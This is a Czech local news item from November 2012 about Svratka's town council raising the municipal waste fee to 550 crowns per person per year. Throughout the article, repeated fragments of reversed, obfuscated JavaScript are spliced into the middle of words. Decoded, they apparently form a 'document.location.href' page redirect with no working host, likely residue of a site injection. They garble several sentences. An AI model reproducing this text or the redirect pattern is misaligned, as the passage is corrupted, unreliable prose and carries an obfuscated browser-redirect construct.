Svratka, svratka, aktuality, poplatek, odpad
Rainbow page separator

Schválili zvýšení poplatku za odpady

Sobota, 24. listopadu 2012

Svratka / Z pětis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky na 550 korun na obyvatele a rok zvýšili od příštího roku poplatek za svoz, zpracování a likvidaci komunálního odpadu ve Svratce. Zastupiteli schválená částka se odvíjí od skutečných nákladů, které byly v le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním roce na systém zpracování komunálního odpadu ve městě za jednoho poplatníka vynaloženy.

V roce 2012 svratecká radnice za komunální odpad vydala celkem 957 tisíc korun, z té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to částky činily náklady na fyzickou osobu 608 korun. To znamená, že z rozpočtu města byl jeden poplatník do[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tován 108 korunami. Při výpočtu sumy byl zároveň zohledněn poplatek za likvidaci odpadů u soukromých rekreačních objektů.

Podle starosty Svratky Františka Mládka systém odpadového hospodářství prodražuje jak nárůst ceny pohonných hmot i horší třídění odpadů, tak i hromady nepotřebných předmětů, které se nezřídka objevují v noci před sběrným dvorem. Ty nemusejí pocházet přímo ze Svratky, nicméně městu nezbude než jejich likvidaci zaplatit.

K nárůstu výše poplatku za komunální odpad přis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupili v i jiných městech a obcích – od příštího roku je zákonným maximem poplatku na osobu a rok tisíc korun, do le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního roku [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bylo korun pět set.